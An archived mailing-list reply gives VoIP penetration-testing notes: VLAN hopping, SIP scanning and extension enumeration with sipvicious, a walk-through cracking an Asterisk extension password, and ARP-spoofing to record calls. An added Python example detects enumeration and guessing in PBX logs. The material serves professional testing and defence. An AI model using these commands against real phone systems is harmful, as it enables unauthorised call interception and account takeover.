Security Basics mailing list archives
Re: pentesting voip network-please help
From: Joseph McCray <joe () learnsecurityonline com>
Date: Mon, 01 Feb 2010 13:42:20 -0500
Welcome to Pentesting, Marco...here are some snippets of my notes from a
previous VoIP pentest of mine. There are some other things you can do as
well - let me know the scope of the pentest and maybe I can help you out.

##########################
# Attempt Voice VLAN Hop #
##########################
wget http://www.candelatech.com/~greear/vlan/vlan.1.9.tar.gz
tar -zxvf vlan.1.9.tar.gz
cd vlan
tshark -i eth0 -v -v "ether host 01:00:0c:cc:cc:cc and (ether[24:2] = 0x2000 or ether[20:2] = 0x2000)" | grep voice
vconfig add eth0 200       # 200 is Voice VLAN ID in example
ifconfig eth0.200          # Verify new interface was created
dhcpd -d -t 10 eth0.200    # Try to get dhcp

or

voiphopper

##################################
# Search for SIP enabled devices #
##################################
./smap -O [ip_address]/24

or

./svmap.py -p3478,5060,5061,8000-8100,10000 [ip_address]/24

##############
# Sipvicious #
##############

###########################################
# Identify active extensions (sipvicious) #
###########################################
./svwar.py [ip_address] -e1000-2000

##################################################
# Attack the extensions found above (sipvicious) #
##################################################
./svcrack.py 2[ip_address] -u1023 -r1000-2000

###################################
# Example sipvicious walk-through #
###################################
[j0e@LinuxHacktop sipvicious]$ ./svmap.py [ip_address]
| SIP Device        | User Agent   |
-------------------------------------
| [ip_address]:5060 | Asterisk PBX |

[j0e@LinuxHacktop sipvicious]$ ./svwar.py [ip_address]
WARNING:root:found nothing

[j0e@LinuxHacktop sipvicious]$ ./svwar.py [ip_address] -e1000-2000
| Extension | Authentication |
------------------------------
| 1023      | reqauth        |

[j0e@LinuxHacktop sipvicious]$ ./svcrack.py [ip_address] -u1023 -r1000-2000
| Extension | Password |
------------------------
| 1023      | 1023     |

################################
# MITM for VoIP Call Recording #
################################
Window 1
arpspoof -i eth0 -t <spoofvictimip> <callmanager>

Window 2
fragrouter -B1

Window 3
wireshark &
(Click Statistics | RTP | Show All Streams)
(Click one of the RTP streams and then select Analyze)
(Click Save Payload and you can save it as a .au or .raw file)

or

vomit -r phone.dump | waveplay -S8000 -B16 -C1

--
Joe McCray
Toll Free: 1-866-892-2132
Email: joe () learnsecurityonline com
LinkedIn: http://www.linkedin.com/in/joemccray
Twitter: http://twitter.com/j0emccray
Website: http://www.learnsecurityonline.com

New Advanced Penetration Testing Course: http://tinyurl.com/apt-course

Video of my Advanced SQL Injection Presentation: http://tinyurl.com/j0e-McCray-sql-Injection

"The only thing worse than training good employees and losing them is NOT
training your employees and keeping them."
- Zig Ziglar
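The extension scan and password guessing in the walk-through above leave a recognizable trail of failed registrations on the PBX. The following is an added example, not part of the original post, showing how a defender could flag both patterns from registration-failure log lines. The log format (modelled on Asterisk chan_sip notices), the thresholds and all addresses are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Assumed log shape: Asterisk chan_sip-style registration-failure notices.
# Adjust LINE_RE to whatever your PBX actually writes.
LINE_RE = re.compile(
    r"Registration from '.*?<sip:(?P<ext>[^@>]+)@[^>]*>' failed for "
    r"'(?P<src>[\d.]+)(?::\d+)?' - (?P<reason>.+)$")

def _line(ext, src, reason):
    """Build one constructed sample log line (not captured from a real PBX)."""
    return ("[2010-02-01 13:40:00] NOTICE[2101] chan_sip.c: Registration from "
            f"'<sip:{ext}@192.0.2.10>' failed for '{src}' - {reason}")

# Constructed input: one source sweeps extensions 1000-1007 and then retries
# extension 1023 six times; a second source mistypes a password once.
SAMPLE_LOG = "\n".join(
    [_line(e, "198.51.100.7", "No matching peer found") for e in range(1000, 1008)]
    + [_line(1023, "198.51.100.7", "Wrong password") for _ in range(6)]
    + [_line(1005, "192.0.2.44", "Wrong password")])

def detect(log_text, enum_threshold=5, guess_threshold=5):
    """Return alerts as (kind, source_ip, extension_or_None, count) tuples."""
    probed = defaultdict(set)    # source -> distinct extensions it tried
    wrong_pw = defaultdict(int)  # (source, extension) -> failed-auth count
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue  # unrelated log line
        probed[m["src"]].add(m["ext"])
        if "Wrong password" in m["reason"]:
            wrong_pw[(m["src"], m["ext"])] += 1
    # Many distinct extensions from one source: enumeration sweep.
    alerts = [("extension-enumeration", src, None, len(exts))
              for src, exts in probed.items() if len(exts) >= enum_threshold]
    # Repeated wrong passwords against one extension: credential guessing.
    alerts += [("password-guessing", src, ext, n)
               for (src, ext), n in wrong_pw.items() if n >= guess_threshold]
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The single failure from the second source stays below both thresholds, so an ordinary mistyped password does not raise an alert.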